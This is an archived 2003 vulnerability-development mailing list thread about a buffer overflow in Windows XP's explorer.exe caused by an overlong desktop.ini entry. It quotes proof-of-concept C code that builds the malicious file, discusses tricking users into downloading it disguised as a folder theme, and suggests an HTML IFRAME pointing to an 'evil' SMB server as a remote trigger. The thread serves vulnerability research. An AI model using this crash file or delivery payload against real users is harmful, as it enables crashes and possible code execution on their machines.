Vulnerability Development mailing list archives
Re: Buffer overflow in Explorer.exe
From: Kris Matthews <krism () mailsnare net>
Date: 11 May 2003 16:39:24 -0400
I have been unable to reproduce it in this fashion; my quick-and-dirty guess is that explorer.exe does not attempt to interpret that file for remote (smb/etc) shares. However, if you do it from a _local_ share.... It still blows up quite nicely. :) Regards, Kristopher On Sun, 2003-05-11 at 13:55, Berend-Jan Wever wrote:
Could this not be done remotely without user interaction except browsing an evil website by using SMB ? <HTML><BODY> <IFRAME src="\\my-evil-server\"> </BODY></HTML> You can make IE browse a harddisk which' contents you control... I don't have XP so I can't test this. Let me know what you find. Cheers, Berend-Jan Wever ----- Original Message ----- From: "Kristopher Matthews" <krism () mailsnare net> To: "'Ryan Yagatich'" <ryany () pantek com> Cc: <vuln-dev () securityfocus com> Sent: Friday, May 09, 2003 18:42 Subject: RE: Buffer overflow in Explorer.exe I have tested and duplicated this behavior on a fully patched/updated Windows XP Pro system. 1. The overflow is for that particular key, AFAICT. 1a. It will not work for the root (c:/) directory; explorer.exe does not parse 'desktop.ini' for that directory. It will, however, work for any other directory. 2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It looks for all the world like a standard buffer overflow; I believe a more carefully crafted 'desktop.ini' file could be cause for explorer.exe to unintentionally execute arbitrary code. 3. Download and execute untrusted code? Combine this with any of the other popular expoloits for windows; also, it wouldn't be terribly hard to get a user to download a 'desktop.ini' file to their "My Documents" directory (in the guise, of, say, a folder them, which windows does support; e.g. different background, file layout, etc); bam, whenever they open that directory, explorer crashes. Regards, Kristopher -----Original Message----- From: Ryan Yagatich [mailto:ryany () pantek com] Sent: Thursday, May 08, 2003 6:28 PM To: at4r () 3wdesign es Cc: vuln-dev () securityfocus com Hi, I don't quite understand the purpose behind this code. It creates a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the contents of [.ShellClassInfo] AAAAAAAAAAAA {x2301} And then terminates? I don't have a windows machine available to really explore this any, but what makes that entry in desktop.ini cause this? Furthermore, is this issue only for that particular key or is it generally just key/excessive parameter/missing value size that is affected? And additionally, you mention that explorer will no longer be able to operate when trying to browse the hard disk, but does this mean globally, or when they try to browse the c:/ drive, or just that particular folder? Please send me more information about this, (even if it references past posts that I have missed) so that I can better understand the severity of this. Espcially since to me, I still see it as someone needing to download and execute untrusted software which causes a system crash, and if that were going to happen there are far worse things that can be done besides creating a small text file. Thanks, Ryan Yagatich ,_____________________________________________________, \ Ryan Yagatich support () pantek com \ / Pantek Incorporated (877) LINUX-FIX / \ http://www.pantek.com/security (440) 519-1802 \ / Are your networks secure? Are you certain? / \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\ On Wed, 7 May 2003, aT4r InsaN3 wrote:This bug allow a malicious an attacker to execute data with privileges of auser that is browsing the hard disk with explorer. tested against winxp SP1 example code provided.<snip>strcpy(path,"\\aT4r[at]3WDesign.es Security"); mkdir(path); SetFileAttributes(path,FILE_ATTRIBUTE_READONLY); strcat(path,"\\desktop.ini");bof=fopen(path,"w"); fputs("[.ShellClassInfo]\n",bof); memset(evil,'A',BUFF); fputs(evil,bof); fclose(bof);<snip>
Current thread:
- Buffer overflow in Explorer.exe aT4r InsaN3 (May 08)
- Re: Buffer overflow in Explorer.exe Ryan Yagatich (May 09)
- RE: Buffer overflow in Explorer.exe Kristopher Matthews (May 09)
- Re: Buffer overflow in Explorer.exe Berend-Jan Wever (May 11)
- Re: Buffer overflow in Explorer.exe Kris Matthews (May 12)
- RE: Buffer overflow in Explorer.exe Kristopher Matthews (May 09)
- Re: Buffer overflow in Explorer.exe Ryan Yagatich (May 09)
- <Possible follow-ups>
- Re: Buffer overflow in Explorer.exe aT4r InsaN3 (May 09)